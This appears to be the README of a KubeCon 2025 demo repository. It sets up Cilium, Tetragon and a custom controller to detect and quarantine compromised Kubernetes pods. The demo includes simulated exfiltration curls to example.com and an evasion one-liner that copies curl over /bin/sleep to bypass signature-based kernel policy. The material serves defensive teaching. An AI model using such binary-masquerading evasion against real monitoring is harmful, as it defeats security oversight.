This repository contains the demonstration code and manifests for the KubeCon CiliumCon North America 2025 talk: "Containing Wildfires in a Sprawling Multi-Cluster Network: The Network's Immune System".
It demonstrates a closed-loop security response system that transforms a passive network into an active immune system using Cilium, Tetragon, and a custom automation controller.
Traditional security relies on manual incident response, which is often too slow to stop lateral movement. This demo introduces a multi-layered automated defense:
- The Reflex (Tetragon): A kernel-level
TracingPolicythat executes in milliseconds to instantly neutralize known, high-confidence threats (e.g., accessing unauthorized external domains). - The Brain (Quarantine Controller): A custom controller that analyzes behavioral context to catch advanced evasion attempts that bypass simple signature-based reflexes. It provides lasting containment by "shrink-wrapping" the compromised workload with a Cilium Network Policy.
While this demonstration is built and documented using Google Cloud Platform (GKE) and Google Artifact Registry (GAR) for ease of reproduction, the underlying architectural patterns—using eBPF for detection (Tetragon) and enforcement (Cilium)—are platform-agnostic. They can be adapted to run on any cloud provider or On-Premise Kubernetes environment that supports Cilium. It should be noted that running the shown demo setup will incur cost.
To reproduce this demo, the following tools must be installed on the operator's workstation:
- Google Cloud CLI (
gcloud) - For provisioning GKE infrastructure (if using GCP). kubectl- For interacting with the Kubernetes API.helm- Required for installing Tetragon.- Docker Desktop or equivalent - For building and pushing the controller image.
- Cilium CLI - For installing and managing Cilium and Hubble.
This guide assumes two Kubernetes clusters: West (Attacker/Victim) and East (Internal Backend).
-
Provision Clusters: Create two GKE Standard clusters in different regions (e.g.,
us-west1andus-east1).- Critical: Ensure Dataplane V2 is disabled (
--no-enable-dataplane-v2) to allow installation of standard open-source Cilium. - Tip: Rename the kubeconfig contexts to
gke-westandgke-eastfor ease of use.
- Critical: Ensure Dataplane V2 is disabled (
-
Install Cilium & Enable Cluster Mesh: Install Cilium with unique cluster IDs and enable the mesh interfaces.
# 1. Install on West (ID 1) cilium install --context gke-west --version 1.18.3 \ --set cluster.name=gke-west \ --set cluster.id=1 \ --set ipam.mode=kubernetes \ --set hubble.relay.enabled=true \ --set hubble.ui.enabled=true cilium clustermesh enable --context gke-west --service-type LoadBalancer # 2. Install on East (ID 2) cilium install --context gke-east --version 1.18.3 \ --set cluster.name=gke-east \ --set cluster.id=2 \ --set ipam.mode=kubernetes \ --set hubble.relay.enabled=true \ --set hubble.ui.enabled=true cilium clustermesh enable --context gke-east --service-type LoadBalancer
> Wait until the
clustermesh-apiserverservice in both clusters has an external IP before proceeding. -
Synchronize Certificate Authority (CA): For mTLS to work across clusters, they must share a root CA. The CA from the cluster in West should be exported and applied to the cluster in East.
# 1. Extract CA from the cluster in West. kubectl get secret -n kube-system cilium-ca --context gke-west -o yaml > cilium-ca.yaml # 2. Sanitize the secret (remove unique metadata). # Note: For standard Linux, remove the empty '' argument from sed -i. sed -i '' '/creationTimestamp:/d' cilium-ca.yaml sed -i '' '/resourceVersion:/d' cilium-ca.yaml sed -i '' '/uid:/d' cilium-ca.yaml # 3. Apply the CA to the cluster in East and restart Cilium to pick up the new CA. kubectl apply -f cilium-ca.yaml --context gke-east kubectl delete pod -n kube-system -l k8s-app=cilium --context gke-east
-
Connect Clusters: Establish the mesh connection.
cilium clustermesh connect --context gke-west --destination-context gke-east # Verify connection. cilium clustermesh status --context gke-west --wait -
Install Tetragon: Deploy Tetragon into the
kube-systemnamespace of the West cluster (the active defense cluster).helm repo add cilium [https://helm.cilium.io/](https://helm.cilium.io/) helm repo update helm install tetragon cilium/tetragon -n kube-system --kube-context gke-west
-
Configure Environment: Export the necessary variables for the GCP environment in the terminal:
export GCP_PROJECT_ID="gcp-project-id" export GCP_REGION="us-west1" export GAR_REPO_NAME="gar-repo-name" # Name of the Google Artifact Registry (GAR) Container Image Repository.
-
Build and Deploy Controller: Update the required variables in the provided setup script and run the same. This will build the Python controller image, push it to the container registry, and generate the Kubernetes manifests with the correct image tags.
./setup.sh
-
Apply Manifests: Deploy the components to the appropriate clusters.
- West Cluster (Active Defense):
kubectl apply -f manifests/vaccine.yaml --context gke-west kubectl apply -f manifests/controller.yaml --context gke-west kubectl apply -f manifests/frontend.yaml --context gke-west # Stub service for DNS resolution of remote backend. kubectl apply -f manifests/backend-service-stub.yaml --context gke-west - East Cluster (Remote Backend):
kubectl apply -f manifests/backend.yaml --context gke-east
- West Cluster (Active Defense):
This section details the step-by-step flow to demonstrate the "Reflex vs. Brain" capabilities.
The architecture relies on a "Nerve Conduit" to pipe Tetragon JSON events from the secure kernel stream to the user-space controller.
-
Start Controller Logs (Terminal 1): Monitor the decision-making engine.
kubectl logs -f -n kube-system -l app=quarantine-controller --context gke-west
-
Establish Nerve Conduit (Terminal 2 - Background): Keep this running throughout the demo.
# Open port-forward to the controller service. kubectl port-forward -n kube-system svc/quarantine-svc 5000:80 --context gke-west & sleep 5 # Pipe Tetragon events to the controller. # Uses IFS= read -r to prevent corruption of complex JSON events. kubectl logs -n kube-system -l app.kubernetes.io/name=tetragon -c export-stdout -f --context gke-west | \ grep --line-buffered "^{" | \ while IFS= read -r line; do curl -s -X POST -H "Content-Type: application/json" -d "$line" http://localhost:5000/tetragon-hook > /dev/null done &
-
Open Attacker Console (Terminal 3): This is where all attack scenarios will be executed.
Enhance visibility by setting up real-time monitoring tools.
-
Launch Hubble UI (Browser): Visualize network flows and policy verdicts in real-time.
cilium hubble ui --context gke-west
- Open
http://localhost:12000in the browser. - Select the
demonamespace from the top-left dropdown menu.
- Open
-
Start Label Watcher (Terminal 4): Observe the exact moment the quarantine label is applied to the Pod.
watch -n 0.1 "kubectl get pod -n demo -l app=frontend --show-labels --context gke-west"
Open Attacker Console (Terminal 3): Set a variable for the target pod to make subsequent commands easy to copy-paste.
export POD=$(kubectl get pod -n demo -l app=frontend -o jsonpath="{.items[0].metadata.name}" --context gke-west)Verify that cross-cluster traffic works under normal conditions. Show that the network is currently wide open. The attacker can reach internal services AND exfiltrate data to the public internet.
kubectl exec -it -n demo $POD --context gke-west -- curl -s backend-global.demo.svc.cluster.localExpected Result: Successful HTTP response from Nginx (backend-global).
Hubble Observation: Green flows appear from frontend to backend-global.
Note: It should be noted that an attacker can do data exfiltration unless some security measures are enforced, as shown below.
kubectl exec -it -n demo $POD --context gke-west -- curl -I https://www.example.com
# Result: HTTP/2 200 (Success! Data exfiltrated.).Demonstrate instant, millisecond-level blocking of known malicious indicators using TracingPolicy.
- Activate the Reflex:
Apply the Tetragon policy to the West cluster.
kubectl apply -f manifests/reflex.yaml --context gke-west
- Execute Attack: Attempt exfiltration.
kubectl exec -it -n demo $POD --context gke-west -- curl -I https://www.example.com
Expected Result: Immediate termination with exit code 137 (SIGKILL). The process is stopped by the kernel before it can open a network connection.
Hubble Observation: No flows generated (process died before network activity).
Demonstrate how attackers can bypass simple signature-based detection by leveraging authorized system binaries (e.g., substituting curl with sleep and executing it via an interactive shell).
# 1. Execute Evasion Attack.
kubectl exec -it -n demo $POD --context gke-west -- /bin/sh -c "cp /usr/bin/curl /bin/sleep && /bin/sleep -I https://www.example.com"Expected Result: The command will hang indefinitely.
Observation (Terminal 1): The controller detects the anomalous parent process (/bin/sh launching /bin/sleep) and applies the quarantine label.
Label Watcher (Terminal 4): The quarantine=true label appears on the Pod.
Prove that the compromised Pod is now fully isolated from the network.
# Attempt legitimate lateral movement again.
kubectl exec -it -n demo $POD --context gke-west -- curl -m 2 backend-global.demo.svc.cluster.localExpected Result: Connection timeout. The CiliumClusterwideNetworkPolicy has successfully "shrink-wrapped" the compromised workload.
Hubble Observation: New flows from frontend to backend-global are RED, indicating Verdict: DROPPED (Policy).
Anmol Krishan Sachdeva
LinkedIn@greatdevaks | Twitter@greatdevaks
Paras Mamgain
LinkedIn@parasmamgain | Twitter@mamgainparas
- The content and views presented during the session are authors' own and not of any organizations they are associated with or employed at.
- Some images used in the presentation might be generated with the assistance of artificial intelligence. Such illustrative representations might not convey accurate or factually correct information.
- The code shown in this repository is for illustration and educational purposes only.
- The code is not production-grade; error handling, security, and scalability are not fully addressed.